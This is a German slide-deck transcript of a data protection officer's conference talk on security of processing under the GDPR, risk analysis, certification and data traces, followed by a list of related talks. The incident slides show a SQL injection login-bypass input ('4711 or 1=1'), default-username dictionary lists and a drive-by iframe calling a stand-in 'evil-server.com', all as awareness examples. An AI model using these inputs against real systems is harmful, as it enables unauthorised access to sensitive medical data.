Sicherheit der Verarbeitung Verantwortung für Datenspuren. Was ändert sich, was bleibt?

Größe: px
Ab Seite anzeigen:

Download "Sicherheit der Verarbeitung Verantwortung für Datenspuren. Was ändert sich, was bleibt?"

Transkript

1 Sicherheit der Verarbeitung Verantwortung für Datenspuren. Was ändert sich, was bleibt? BvD Herbstkonferenz , Stuttgart Folie: 1/95

2 Helmut Stellvertretender Datenschutzbeauftragter Rheinland-Pfalz Leiter Bereich Technik Postanschrift: Postfach Mainz Büroanschrift: Hintere Bleiche Mainz Telefon: +49 (6131) Telefax: +49 (6131) Web: Folie: 2/95

3 IT-Entwicklung Der Wandel! Location Based Services! Ubiquitous Computing! Smart Home/Car/Metering...! RFID, VR,! Big Data! Autonome Systeme!... Cloud Computing mobile Datenverarbeitung + Internet Individuelle Datenverarbeitung mobile Datenverarbeitung Individuelle Datenverarbeitung + Internet Folie: 3/95

4 IT-Entwicklung Kontinuität 9 BDSG (Anlage)! Zutrittskontrolle! Zugangskontrolle! Zugriffskontrolle! Weitergabekontrolle! Eingabekontrolle! Auftragskontrolle! Verfügbarkeitskontrolle! Zweckbindungskontrolle mobile Datenverarbeitung Individuelle Datenverarbeitung + Internet Cloud Computing mobile Datenverarbeitung + Internet Individuelle Datenverarbeitung Folie: 4/95

5 9 BDSG (Anlage)! Zutrittskontrolle?! Zugangskontrolle! Zugriffskontrolle?! Weitergabekontrolle! Eingabekontrolle?! Auftragskontrolle?! Verfügbarkeitskontrolle! Zweckbindungskontrolle mobile Datenverarbeitung Cloud Computing 5 Folie: 5/95

6 Lieferanten Geschäftspartner IT-Dienstleister Konzern unternehmen Schutz digitaler Assets Call Center Joint Venture Unternehmen Unternehmen Kunden Folie: 6/95

7 Folie: 7/95

8 Sicherheitsvorfälle Folie: 8/95

9 Anmeldeaufforderung.HTACCESS Folie: 9/95

10 eiermann xxxxxx Folie: 10/95

11 Hippokrates 2.0 Praxen im Netz... für die Kennung test mit beliebigem Passwort LfD Rheinland-Pfalz H. Folie: 11/95

12 Hippokrates 2.0 Praxen im Netz... für vorgewählte Kennungen in einer Datei mit einem beliebigem Passwort (Wörterbuchattacke) z.b. admin administrator system sa nimda service test... LfD Rheinland-Pfalz H. Folie: 12/95

13 Folie: 13/95

14 Folie: 14/95

15 Dahinter stehende SQL-Anweisung: select... from... where name=... and passwd=... Folie: 15/95

16 Dahinter stehende SQL-Anweisung: select... from... where name=... and passwd=... Benutzereingabe führt zu: select... from... where name= 4711 or 1=1 Folie: 16/95

17 Anmeldung ohne gültige Benutzerkennung oder Passwort war möglich Zeitaufwand ca. 5 sec Folie: 17/95

18 Folie: 18/95

19 Folie: 19/95

20 Behandlungsdokumentation Folie: 20/95

21 Verschreibungen Folie: 21/95

22 Liste säumiger Zahler Folie: 22/95

23 Passwortdatei Folie: 23/95

24 ... admin.asp, admin.js, admin.html Wir finden Dich... login.asp, login.js, login.html... anmeldung.asp, anmeldung.js, anmeldung.html Folie: 24/95

25 Hackers Google - SHODAN Folie: 25/95

26 Hackers Google Folie: 26/95

27 Hackers Google Folie: 27/95

28 BSI Lagebericht IT-Sicherheit Drive-by-Exploits Größte Gefahr bei Sicherheitslücken in Anwendungssoftware (CERT-Bund: 20/Woche) Folie: 28/95

29 Drive-by-Infection server.com evil-server.com <html> <iframe src=evil-server.com/eval.php </body> Evaluation Clientdaten: Betriebssystem Browsertyp / Version Konfiguration Exploit Plugins Schadcode - Fernsteuerung Keylogger Scanner Folie: 29/95

30 Folie: 30/95

31 Drive-by-Infection Folie: 31/95

32 Drive-by-Infection Folie: 32/95

33 9 BDSG (Anlage)! Zutrittskontrolle?! Zugangskontrolle! Zugriffskontrolle?! Weitergabekontrolle! Eingabekontrolle?! Auftragskontrolle?! Verfügbarkeitskontrolle! Zweckbindungskontrolle mobile Datenverarbeitung Cloud Computing 33 Folie: 33/95

34 Systematik der IT-Sicherheit / IT-Grundschutz Verfügbarkeit Vertraulichkeit Integrität Folie: 34/95

35 Datenschutz technisch-organisatorische Maßnahmen IT-Sicherheit Folie: 35/95

36 * Eckpunkte der Konferenz der Datenschutzbeauftragten des Bundes und der Länder Ein modernes Datenschutzrecht für das 21. Jahrhundert ( ) Folie: 36/95

37 Technikregelungen der Datenschutzgesetze Kontrollarten! Zutrittskontrolle! Zugangskontrolle! Zugriffskontrolle! Weitergabekontrolle! Eingabekontrolle! Auftragskontrolle! Verfügbarkeitskontrolle! zweckbezogene Verarbeitung technikoffene Schutzziele *! Verfügbarkeit! Integrität! Vertraulichkeit! Transparenz! Authentizität! Revisionsfähigkeit! Nichtverkettbarkeit! Intervenierbarkeit! Systemdatenschutz! Audit / Zertifizierung! Selbstdatenschutz * Eckpunkte der Konferenz der Datenschutzbeauftragten des Bundes und der Länder Ein modernes Datenschutzrecht für das 21. Jahrhundert ( ) Folie: 37/95

38 Das Standard-Datenschutzmodell (2016) 38 Folie: 38/95

39 Folie: 39/95

40 EU Datenschutz-Grundverordnung Sicherheit der Verarbeitung 40 Folie: 40/95

41 EU Datenschutz-Grundverordnung - Instrumentarium " Sicherheit der Verarbeitung Erwägungsgründe 78, 83,84 Artikel 5, 25, 32 " Verhaltensregeln Erwägungsgründe 77, 81, 98, 99, 148 Artikel 24, 28, 32, 35, 40, 41 " Datenschutzfolgeabschätzung Erwägungsgründe 84, 89, 90-92, 94, 95 Artikel 35, 36, 39 Folie: 41/95

42 EU Datenschutz-Grundverordnung Instrumentarium " Zertifizierung Erwägungsgründe 77, 81, 100, 166 Artikel 24, 25,28, 32, 42, 43 " Datenschutzsiegel und prüfzeichen Erwägungsgründe 100 Artikel 42, 43 Folie: 42/95

43 EU DSGVO Art. 5 Grundsatz: angemessene Sicherheit [ ] Folie: 43/95

44 EU DSGVO Art. 5 Grundsatz: angemessene Sicherheit [ ] Folie: 44/95

45 EU DSGVO Art. 25 Datenschutz durch Technik & Voreinstellung Risikoadäquanz Folie: 45/95

46 EU DSGVO Art. 32 Sicherheit der Verarbeitung Risikoadäquanz Angemessene TOM 46 Folie: 46/95

47 EU DSGVO Art. 32 Sicherheit der Verarbeitung Vertraulichkeit Integrität Verfügbarkeit Sicherheitsmanagement 47 Folie: 47/95

48 EU DSGVO Art. 32 Sicherheit der Verarbeitung Risikoanalyse und -bewertung Folie: 48/95

49 EU DSGVO Art. 42 Zertifizierung Zertifizierungsverfahren Gütesiegel / Zertifikate Folie: 49/95

50 Was ist zu erwarten? Folie: 50/95

51 Instrumentarium DS-GVO! Risikobasierter Ansatz! Datenschutzfolgenabschätzung, Art. 35! Hohes Risiko der Rechtsverletzung! Datenschutzmanagementsystem, Art. 32 (1) d! RechenschaDspflicht, Art. 5 (2)! Verhaltensregeln, Art. 40! Datenschutz im wirtschadlichen WeLbewerb! AkkrediMerung, Art. 41! Gütesiegel, Art. 42! ZerMfizierung, Art. 42, 43 Folie: 51/95

52 Stand der Technik Folie: 52/95

53 Verwaltung Wirtschaft Datenschutz 27001! Verfügbarkeit! Integrität! Vertraulichkeit! Transparenz! Authentizität! Revisionsfähigkeit! Nichtverkettbarkeit! Intervenierbarkeit IT-Sicherheit Folie: 53/95

54 Codes of Conduct / Verhaltensregeln Folie: 54/95

55 EU-Mitgliedsstaaten EU-Kommission Codes of Conduct EU-Datenschutzausschuss Aufsichtsbehörden Verbände z.b.: BSI: BSI Standards bis 4 ISO / IEC Folie: 55/95

56 EU-Mitgliedsstaaten EU-Kommission Codes of Conduct EU-Datenschutzausschuss Aufsichtsbehörden Verbände z.b.: ENISA: Leitlinien für Sicherheitsmaßnahmen Zu Art. 4/13 der e-privacy-richtlinie (2992/58/EC) EuroPrise: Sichereheitsmaßnahmen nach dem Europäischen Datenschutzsiegel 2013/0027 (COD): Entwurf EU-Richtlinie zur Netzwer- Informationssicherheit Folie: 56/95

57 EU-Mitgliedsstaaten EU-Kommission Codes of Conduct EU-Datenschutzausschuss Aufsichtsbehörden Verbände z.b.: DSB-Konferenez (D) CNIL (F) [ ] Standard Datenschutzmodell Good Practice Catalogue [ ] Art. 29-Gruppe Folie: 57/95

58 EU-Mitgliedsstaaten EU-Kommission Codes of Conduct EU-Datenschutzausschuss Aufsichtsbehörden Verbände z.b.: Datenschutzstandard DS-BvD-GDD-01 CoC Versicherungswirtschaft CoC Online-Werbung [ ] Folie: 58/95

59 Zertifizierung Folie: 59/95

60 Zertifizierungen EU-Kommission (delegierte Rechtsakte) Folie: 60/95

61 Folie: 61/95

62 Risikoanalyse / Datenschutzfolgeabschätzung Folie: 62/95

63 Risikoanalyse/Bewertung Folie: 63/95

64 Risiko = Schutzbedarf Risiko = Schaden x Eintrittswahrscheinlichkeit Folie: 64/95

65 Potentielle Risikobereiche:! Datensparsamkeit! Verfügbarkeit! Integrität! Vertraulichkeit! Nichtverkettbarkeit (Zweckbindung)! Transparenz! Intervenierbarkeit (Betroffenenrechte) Folie: 65/95

66 Potentielle Risikobereiche: Risikominimierung:! Datensparsamkeit! Verfügbarkeit ü! Integrität ü! Vertraulichkeit ü! Nichtverkettbarkeit! Transparenz ü! Intervenierbarkeit ü ü ü No risk no DSFA! fun! Folie: 66/95

67 Folie: 67/95

68 Datenschutzfolgeabschätzung = Vorabkontrolle Folie: 68/95

69 Datenschutzfolgeabschätzung Vorabkontrolle Folie: 69/95

70 Vorabkontrolle Inhaltliche Kriterien! Zulässigkeit (Rechtsgrundlage/Einwilligung)! Grundsätze der Datensparsamkeit und Datenvermeidung Datenumfang Personenbezug / Pseudonymisierung! Voraussetzungen für die Verarbeitung besonderer personenbezogener Daten! Wahrung/Gewährleistung der Rechte der Betroffenen Berichtigung, Auskunft, Sperrung Folie: 70/95

71 Vorabkontrolle Inhaltliche Kriterien! Auftragsdatenverarbeitung schriftlicher Auftrag Gewährleistung Sicherheitsmaßnahmen Wahrnehmung der Kontrollpflichten Verpflichtung ggf. Unterrichtung/Genehmigung der Aufsichtsbehörde Berücksichtigung besonderer Berufs- und Amtsgeheimnisse! Löschung Erforderlichkeit Fristen Folie: 71/95

72 Vorabkontrolle Formale Kriterien! Verfahrensverzeichnis! Anhörung der Aufsichtsbehörde / Beteiligungspflichten! Zulassungen soweit erforderlich! Information / Unterrichtung des Betroffenen! Dienstanweisung Folie: 72/95

73 Datenschutzfolgeabschätzung Vorabkontrolle! Datensparsamkeit! Verfügbarkeit! Integrität! Vertraulichkeit! Nichtverkettbarkeit (Zweckbindung)! Transparenz! Intervenierbarkeit (Betroffenenrechte) Risikoanalyse Folie: 73/95

74 Datenschutzmanagement Folie: 74/95

75 IT-Sicherheitsmanagment ISO Folie: 75/95

76 IT-Sicherheitsmanagment ISO Folie: 76/95

77 ISO " Risikobetrachtung und Bewertung " Methodische Behandlung identifizierter Risiken " Verantwortlichkeiten (risk owner) " Reaktion auf Sicherheitsvorfälle " Maßnahmenplanung (Annex A); Erklärung zur Anwendung (statement of applicability) Folie: 77/95

78 ISO (2013) " Zielvorgaben " Risikoanalyse " Maßnahmen " Ressourcen " Verantwortlichkeiten " Umsetzung Folie: 78/95

79 IT-Sicherheitsmanagment ISO Folie: 79/95

80 Die Untoten kommen wieder Folie: 80/95

81 Gesetz zur Anpassung des Datenschutzrechts an die Verordnung (EU) 2016/679 und zur Umsetzung der Richtlinie (EU) 2016/680 (Datenschutz-Anpassungs- und - Umsetzungsgesetz EU DSAnpUG-EU) BDSG-neu Folie: 81/95

82 BDSG / LDSG Rechtsanpassung: BDSG-Neu - erlassen LDSG-Neu - in Vorbereitung Fachgesetze -??? Mai 2016 Verabschiedung EU DSGVO 25. Mai 2018 Technische Datenschutzvorgaben: In-Kraft-Treten EU DSGVO Codes of Conduct? Best Practice? Audit/Zertifizierung? Folie: 82/95

83 EU DSGVO Datenschutzund IT-Sicherheits- Maßnahmen! Verfügbarkeit! Integrität! Vertraulichkeit! Authentizität???! Revisionsfähigkeit! Systemdatenschutz! Audit / Zertifizierung 83 Folie: 83/95

84 datenschutz.rlp.de Folie: 84/95

85 Sicherheit der Verarbeitung nach DSGVO Folie: 85/95

86 Datenspuren Folie: 86/95

87 Situation Industriegesellschaft Informationsgesellschaft Warenflüsse Datenflüsse Folie: 87/95

88 Internet Folie: 88/95

89 Datenspuren im Internet Folie: 89/95

90 Folie: 90/95

91 Individualisierung 91 Folie: 91/95

92 MAC-Adress-Tracking Funknetz Probe-Requests 92 Folie: 92/95

93 MAC-Adress-Tracking MAC 00:40:96:aa:22:20 93 Folie: 93/95

94 Inhalts- und Metadaten snowden-nsa-files-surveillance-revelations-decoded#section/3 Folie: 94/95

95 Inhalts- und Metadaten snowden-nsa-files-surveillance-revelations-decoded#section/3 Folie: 95/95

96 Inhalts- und Metadaten snowden-nsa-files-surveillance-revelations-decoded#section/3 Folie: 96/95

97 Inhalts- und Metadaten snowden-nsa-files-surveillance-revelations-decoded#section/3 Folie: 97/95

98 Inhalts- und Metadaten snowden-nsa-files-surveillance-revelations-decoded#section/3 Folie: 98/95

99 Inhalts- und Metadaten snowden-nsa-files-surveillance-revelations-decoded#section/3 Folie: 99/95

100 Inhalts- und Metadaten snowden-nsa-files-surveillance-revelations-decoded#section/3 Folie: 100/95

101 Datenspuren Selbstdatenschutz Folie: 101/95

102 Folie: 102/95

103 e-privacy-verordnung Folie: 103/95

104 Folie: 104/95

105 Folie: 105/95

106 2002 e-privacy Richtlinie TK Telekommunikation TMG Informations- und Kommunikationsdienste (Over-the-Top-Dienste OTT) 2018 e-privacy Verordnung Telekommunikation Trilog COM-EP-EC OTT 1 (Mail, Messenger,...)? OTT 2 (Internet-Angebote, Social Media-Dienste,...) Folie: 106/95

107 Inhalts- und Metadaten snowden-nsa-files-surveillance-revelations-decoded#section/3 Folie: 107/95

108 2018 Datenschutz- Grundverordnung 2018 e-privacy Verordnung Sicherheit der Verarbeitung Art. 25 Art. 32 Pseudonymisierung Verschlüsselung Risikoanalyse DS-Folgeabschätzung... Folie: 108/95

109 2018 Datenschutz- Grundverordnung 2018 e-privacy Verordnung Sicherheit der Verarbeitung Art. 25 Art. 32 Pseudonymisierung Verschlüsselung Risikoanalyse DS-Folgeabschätzung... Folie: 109/95

110 EU DSGVO Datenschutzund IT-Sicherheits- Maßnahmen! Verfügbarkeit! Integrität! Vertraulichkeit! Authentizität???! Revisionsfähigkeit! Systemdatenschutz! Audit / Zertifizierung 110 Folie: 110/95

111 Helmut Stellvertretender Datenschutzbeauftragter Rheinland-Pfalz Leiter Bereich Technik Postanschrift: Postfach Mainz Büroanschrift: Hintere Bleiche Mainz Telefon: +49 (6131) Telefax: +49 (6131) Web: Folie: 111/95

Hippokrates Praxen im Netz

Hippokrates Praxen im Netz Hippokrates 2.0 - Praxen im Netz Medizinrechtssymposium der Bezirksärztekammer Trier Trier, 17.2.2016 H. Eiermann > 50 % der Praxen verfügen über eine Internet-Präsenz Praxisinformationen, Schwerpunkte,

Mehr

Hippokrates 2.0 - Praxen im Netz

Hippokrates 2.0 - Praxen im Netz Hippokrates 2.0 - Praxen im Netz Initiative Mit Sicherheit gut behandelt. Vortrag Regionalveranstaltungen H. Eiermann Agenda 1 Risiko Schadsoftware 2 Anforderungen an Praxissysteme H. Eiermann Agenda 1

Mehr

IT & Datenschutz 2016 - Was kommt auf die Unternehmen zu?

IT & Datenschutz 2016 - Was kommt auf die Unternehmen zu? IT & Datenschutz 2016 - Was kommt auf die Unternehmen zu? perspektiveit, Boppard, 12.5.2016 H. Eiermann Folie 1 Agenda Safe Harbor / EU US Privacy Shield - Cloud Computing EU Datenschutzgrundverordnung

Mehr

Die erheblichen Einflüsse der Datenschutz-Grundverordnung auf die IT

Die erheblichen Einflüsse der Datenschutz-Grundverordnung auf die IT Die erheblichen Einflüsse der Datenschutz-Grundverordnung auf die IT SK-Consulting Group GmbH Donnerstag, 29. September 2016 Vorstellung Alexander Jung Diplom-Jurist (Univ.) Senior Consultant Datenschutz

Mehr

TÜV NORD Akademie Personenzertifizierung. Zertifizierungsprogramm: Merkblatt Datenschutzbeauftragter (TÜV )

TÜV NORD Akademie Personenzertifizierung. Zertifizierungsprogramm: Merkblatt Datenschutzbeauftragter (TÜV ) TÜV NORD Akademie Personenzertifizierung Zertifizierungsprogramm: Merkblatt Datenschutzbeauftragter (TÜV ) Merkblatt Datenschutzbeauftragter (TÜV ) Personenzertifizierung Große Bahnstraße 31 22525 Hamburg

Mehr

Die neue Grundverordnung des europäischen Datenschutzes

Die neue Grundverordnung des europäischen Datenschutzes Die neue Grundverordnung des europäischen Datenschutzes Was kommt auf die Unternehmen und deren IT-Verantwortliche zu? NIK - Nürnberg, 08. November 2016 Ulrich Neef in Zusammenarbeit mit ODN - INTERNET

Mehr

Datenschutz 2013 Mindestanforderungen, Maßnahmen, Marketing CINIQ - Wie sicher sind Ihre Daten? 9. April 2013

Datenschutz 2013 Mindestanforderungen, Maßnahmen, Marketing CINIQ - Wie sicher sind Ihre Daten? 9. April 2013 Datenschutz 2013 Mindestanforderungen, Maßnahmen, Marketing CINIQ - Wie sicher sind Ihre Daten? 9. April 2013 Karsten U. Bartels LL.M. HK2 Rechtsanwälte 1 Meine Punkte Cloud Service Provider 2 IT-Outsourcing

Mehr

Digitale Transformation alte und neue Anforderungen des Datenschutzrechts

Digitale Transformation alte und neue Anforderungen des Datenschutzrechts Digitale Transformation alte und neue Anforderungen des Datenschutzrechts 28.Oktober 2015 München, 1. März 2016 1 AGENDA (1) Verantwortlichkeiten und vertragsrechtliche Aspekte bei der Nutzung der EU/DE

Mehr

EINLEITUNG... 1 GANG DER UNTERSUCHUNG...3 DATENSCHUTZ IM MULTINATIONALEN KONZERN...5 A. BESTIMMUNG DER WESENTLICHEN BEGRIFFE Datenschutz...

EINLEITUNG... 1 GANG DER UNTERSUCHUNG...3 DATENSCHUTZ IM MULTINATIONALEN KONZERN...5 A. BESTIMMUNG DER WESENTLICHEN BEGRIFFE Datenschutz... EINLEITUNG... 1 GANG DER UNTERSUCHUNG...3 ERSTERTEIL DATENSCHUTZ IM MULTINATIONALEN KONZERN...5 A. BESTIMMUNG DER WESENTLICHEN BEGRIFFE... 5 1. Datenschutz... 5 2. Personenbezogene Daten...5 3. Unternehmen

Mehr

Agenda Datenschutz, rechtliche Grundlagen

Agenda Datenschutz, rechtliche Grundlagen Agenda Datenschutz, rechtliche Grundlagen Sinn und Zweck Umsetzung Prinzipien TOMs, ADV Verstoß, Folgen Sinn des Datenschutzes Jeder soll nach Möglichkeit selbst bestimmen, wer welche Informationen über

Mehr

Aktuelle Herausforderungen im Datenschutz

Aktuelle Herausforderungen im Datenschutz Aktuelle Herausforderungen im Datenschutz Johannes Landvogt c/o Bundesbeauftragter für den Datenschutz und Informationsfreiheit BSI & SIZ Grundschutz Tag Bonn, 09. Februar 2012 1 1 Inhalt Cloud Computing

Mehr

DATENSCHUTZ FÜR SYSTEM- ADMINISTRATOREN 2. Hanno Wagner <rince@cccs.de>

DATENSCHUTZ FÜR SYSTEM- ADMINISTRATOREN 2. Hanno Wagner <rince@cccs.de> DATENSCHUTZ FÜR SYSTEM- ADMINISTRATOREN 2 Hanno Wagner 1 WER BIN ICH? Hanno,Rince Wagner, arbeite in Stuttgart Seit 3 Jahren betrieblicher Datenschutzbeauftragter (für einen mittelständischen

Mehr

Datenschutz-Folgenabschätzung gem. DSGVO

Datenschutz-Folgenabschätzung gem. DSGVO Aus der Vorabkontrolle wird die Folgenabschätzung Datenschutz-Folgenabschätzung gem. DSGVO Folie 1 Reinhard M. Novak Zur Person des Vortragenden Von 1991 bis 2001 IT Manager bei AT&T und Lucent Technologies

Mehr

DATENSCHUTZ UND DATENSICHERHEIT IN ALTERSGERECHTEN ASSISTENZSYSTEMEN

DATENSCHUTZ UND DATENSICHERHEIT IN ALTERSGERECHTEN ASSISTENZSYSTEMEN DATENSCHUTZ UND DATENSICHERHEIT IN ALTERSGERECHTEN ASSISTENZSYSTEMEN Annika Selzer Vortrag an der Fachhochschule Frankfurt am 10. Oktober 2013 AGENDA Begriffsbestimmungen Definition Datenschutz Definition

Mehr

"RESISCAN durch Dritte Rechtliche Anforderungen an die Beauftragung" RA Karsten U. Bartels LL.M., HK2 Rechtsanwälte

RESISCAN durch Dritte Rechtliche Anforderungen an die Beauftragung RA Karsten U. Bartels LL.M., HK2 Rechtsanwälte Informationstag "Ersetzendes Scannen" Berlin, 19.04.2013 "RESISCAN durch Dritte Rechtliche Anforderungen an die Beauftragung" RA Karsten U. Bartels LL.M., HK2 Rechtsanwälte Meine Punkte Leistungsvertrag

Mehr

Datenschutz und IT-Sicherheit an der UniBi

Datenschutz und IT-Sicherheit an der UniBi Datenschutz und IT-Sicherheit an der UniBi 1. Dezember 2009 Ines Meyer Michael Sundermeyer Datenschutz Datenschutz hat Verfassungsrang Recht auf informationelle Selbstbestimmung Datenschutzgesetz Nordrhein-Westfalen

Mehr

- Welche Auswirkungen hat die neue Verordnung für den Mittelstand? -

- Welche Auswirkungen hat die neue Verordnung für den Mittelstand? - EU Datenschutz-Grundverordnung (DSGVO) - Welche Auswirkungen hat die neue Verordnung für den Mittelstand? - PALLAS SECURITY-BREAKFAST Köln, den 15. November 2016 Harald Eul HEC GmbH 50321 Brühl Tel 02232

Mehr

Datenschutz im Client-Management Warum Made in Germany

Datenschutz im Client-Management Warum Made in Germany Datenschutz im Client-Management Warum Made in Germany Wolfgang Schmid 2013 baramundi software AG IT einfach clever managen Wolfgang Schmid, Rechtsanwalt und Fachanwalt IT-Recht Bundesdatenschutzgesetz

Mehr

EU-Grundverordnung zum Datenschutz Was könnte sich für die Unternehmenspraxis ändern?

EU-Grundverordnung zum Datenschutz Was könnte sich für die Unternehmenspraxis ändern? EU-Grundverordnung zum Datenschutz Was könnte sich für die Unternehmenspraxis ändern? DB Mobility Logistics AG Konzerndatenschutz Karen Sokoll, LLM 20.04.2013 Agenda 1. Überblick: Ziel & Stand des Gesetzgebungsverfahrens

Mehr

Das sichere Rechenzentrum Normkonform und ökonomisch sinnvoll?!

Das sichere Rechenzentrum Normkonform und ökonomisch sinnvoll?! Das sichere Rechenzentrum Normkonform und ökonomisch sinnvoll?! Dr. Andreas Gabriel Ethon GmbH 08. Oktober 2014 KURZE VORSTELLUNG 2 Über die Ethon GmbH Über die Ethon GmbH 2003: Gründung Ethon Technologies

Mehr

Hosted Cloud: Kundendatenschutz, Datenschutzmanagement und Auftragsdatenverarbeitung

Hosted Cloud: Kundendatenschutz, Datenschutzmanagement und Auftragsdatenverarbeitung Hosted Cloud: Kundendatenschutz, Datenschutzmanagement und Auftragsdatenverarbeitung 27. September 2016 Rechtsanwalt Boris Reibach Agenda I. Warum Datenschutz? II. Auftragsdatenverarbeitung III. Ausblick

Mehr

Verfahrensverzeichnis

Verfahrensverzeichnis Verfahrensverzeichnis Beschreibung des einzelnen Verfahrens nach 8 DSG NRW Lfd. Nr.: (wird vom DSB vergeben) Neues Verfahren / Erstmeldung Wesentliche Änderung Das Verfahren ist zur Einsichtnahme bestimmt

Mehr

DIE EU-DATENSCHUTZ- GRUNDVERORDNUNG

DIE EU-DATENSCHUTZ- GRUNDVERORDNUNG DIE EU-DATENSCHUTZ- GRUNDVERORDNUNG - EIN ÜBERBLICK - 1 Grundsätzliches zur Datenschutzgrundverordnung Die EU Datenschutz- Grundverordnung Überblick über wesentliche Inhalte Überblick zur Datenschutzorganisation

Mehr

Datenschutz und Datensicherheit rechtliche Aspekte. 13. OSL-Technologietage 24. September 2015 PENTAHOTEL Berlin-Köpenick

Datenschutz und Datensicherheit rechtliche Aspekte. 13. OSL-Technologietage 24. September 2015 PENTAHOTEL Berlin-Köpenick Datenschutz und Datensicherheit rechtliche Aspekte 13. OSL-Technologietage 24. September 2015 PENTAHOTEL Berlin-Köpenick Überblick Grundlagen Datenschutz Grundlagen Datensicherheit Clouds In EU/EWR In

Mehr

Profilingund Scoring in den Verhandlungen zur EU- Datenschutz-Grundverordnung

Profilingund Scoring in den Verhandlungen zur EU- Datenschutz-Grundverordnung Profilingund Scoring in den Verhandlungen zur EU- Datenschutz-Grundverordnung Ulrich Weinbrenner (Leiter der Projektgruppe Datenschutz im Bundesministerium des Innern) Gliederung 1. Bedeutung der DS-GVO

Mehr

1.1.4 Wissen, was unter Verbot mit Erlaubnisvorbehalt 1.1.5. schützen. 1.1.7 Wissen, was man unter personenbezogenen 1.1.8 1.1.

1.1.4 Wissen, was unter Verbot mit Erlaubnisvorbehalt 1.1.5. schützen. 1.1.7 Wissen, was man unter personenbezogenen 1.1.8 1.1. Datenschutz DLGI Dienstleistungsgesellschaft für Informatik Am Bonner Bogen 6 53227 Bonn Tel.: 0228-688-448-0 Fax: 0228-688-448-99 E-Mail: info@dlgi.de, URL: www.dlgi.de Dieser Syllabus darf nur in Zusammenhang

Mehr

BvD. Management-Summary. Überblick in 10 Schritten

BvD. Management-Summary. Überblick in 10 Schritten www.bvdnet.de BvD Management-Summary Überblick in 10 Schritten Berufsverband der Datenschutzbeauftragten Deutschlands (BvD) e.v. Verordnung zum Schutz natürlicher Personen bei der Verarbeitung personenbezogener

Mehr

Grundsatz der Datenvermeidung und Datensparsamkeit ( 3 a BDSG-E) Mobile Speicher und Verarbeitungsmedien ( 6 c BDSG-E)

Grundsatz der Datenvermeidung und Datensparsamkeit ( 3 a BDSG-E) Mobile Speicher und Verarbeitungsmedien ( 6 c BDSG-E) Zwei-Stufen-Modell 1. Stufe: Umsetzung der EG-Datenschutzrichtlinie und Ergänzung durch einige innovative Neuregelungen Grundsatz der Datenvermeidung und Datensparsamkeit ( 3 a BDSG-E) Datenschutz-Audit

Mehr

Informationssicherheit und Datenschutz

Informationssicherheit und Datenschutz Informationssicherheit und Datenschutz Henning Bergmann Datenschutzbeauftragter IT Security Manager Asklepios Kliniken Hamburg GmbH Sylt Barmbek (Hamburg) Falkenstein Ini Hannover Bad Griesbach Inhalt

Mehr

Von der Sensibilisierung zum Datenschutzkonzept Stefan Bachmann INES IT

Von der Sensibilisierung zum Datenschutzkonzept Stefan Bachmann INES IT Von der Sensibilisierung zum Datenschutzkonzept 21.04.2016 Stefan Bachmann INES IT www.ines-it.de Zeitstrahl 2009 Údis \ interne Bestellung INES AG 2010 Externe Bestellungen 2011 2012 2013 2014 Datenschutzkonzept

Mehr

Big Data und die neue Datenschutzverordnung - was können Unternehmen jetzt umsetzen?

Big Data und die neue Datenschutzverordnung - was können Unternehmen jetzt umsetzen? TRUSTED PRIVACY Big Data und die neue Datenschutzverordnung - was können Unternehmen jetzt umsetzen? Prof. Dr. Christoph Bauer eprivacy GmbH Zahlen und Fakten 150 Kunden der eprivacy GmbH eprivacy ist

Mehr

Aktueller Stand der EU- Datenschutz-Grundverordnung Umsetzungsplanungen

Aktueller Stand der EU- Datenschutz-Grundverordnung Umsetzungsplanungen Aktueller Stand der EU- Datenschutz-Grundverordnung Umsetzungsplanungen BvD Symposium 22. Oktober 2015 Ulrich Weinbrenner Leiter der PG Datenschutz im BMI Der Reformprozess Bedeutung der Reform Wer entscheidet

Mehr

Rechtlicher Rahmen für Lernplattformen

Rechtlicher Rahmen für Lernplattformen Rechtlicher Rahmen für Lernplattformen Johannes Thilo-Körner Plattlinger Str. 58a, 94486 Osterhofen, Mobil.: 0151 / 61 61 46 62; Tel.: 09932 / 636 13 66-0, Fax.: 09932 / 636 13 66-9 E-Mail: Johannes@Thilo-Koerner-Consulting.de,Web:

Mehr

Gliederung. A. Einführung. I. Konzept der Vorlesung 1. Darstellung 2. Ziel

Gliederung. A. Einführung. I. Konzept der Vorlesung 1. Darstellung 2. Ziel Gliederung A. Einführung I. Konzept der Vorlesung 1. Darstellung 2. Ziel II. Was ist Datenschutzrecht? 1. Beispiel 2. Ansatzpunkt: Schutz des Persönlichkeitsrechts 3. Datensicherung 4. Datenschutzrechtliches

Mehr

Die Europäische Datenschutz- Grundverordnung und ihre Auswirkungen auf den betrieblichen Datenschutz

Die Europäische Datenschutz- Grundverordnung und ihre Auswirkungen auf den betrieblichen Datenschutz Folie 1 Die Europäische Datenschutz- Grundverordnung und ihre Auswirkungen auf den betrieblichen Datenschutz Diplom-Informatiker Werner Hülsmann - Datenschutzsachverständiger - Münchener Str. 101 / Geb.

Mehr

Datenschutz im Pfarrbüro

Datenschutz im Pfarrbüro Datenschutz im Pfarrbüro Übersicht Datengeheimnis und Beicht- / Seelsorgegeheimnis Datenschutz und Selbstverwaltungsrecht der Kirchen Was heißt informationelle Selbstbestimmung Grundprinzipien des Datenschutzes

Mehr

Outsourcing und Tracking in einer vernetzten Welt

Outsourcing und Tracking in einer vernetzten Welt Outsourcing und Tracking in einer vernetzten Welt Infobörse 2 Referent: Dr. Sven Polenz, ULD Moderation: Harald Zwingelberg, ULD Übersicht 1.1 Auftragsdatenverarbeitung öffentlicher/nichtöffentlicher Stellen

Mehr

DIE EU-DATENSCHUTZ- GRUNDVERORDNUNG

DIE EU-DATENSCHUTZ- GRUNDVERORDNUNG DIE EU-DATENSCHUTZ- GRUNDVERORDNUNG - EIN ÜBERBLICK - OTFRIED BÜTTNER, LL.M. GDD stellvertretender ERFA-Kreisleiter Mülheim an der Ruhr/Essen/Oberhausen IHK Gesprächsforum Datenschutz migosens GmbH 1 Die

Mehr

Datendienste und IT-Sicherheit am 11.06.2015. Cloud Computing und der Datenschutz (k)ein Widerspruch?

Datendienste und IT-Sicherheit am 11.06.2015. Cloud Computing und der Datenschutz (k)ein Widerspruch? Datendienste und IT-Sicherheit am 11.06.2015 Cloud Computing und der Datenschutz (k)ein Widerspruch? Datensicherheit oder Datenschutz? 340 Datenschutz Schutz des Einzelnen vor Beeinträchtigung seines 220

Mehr

Datenschutz Informationssicherheit Compliance

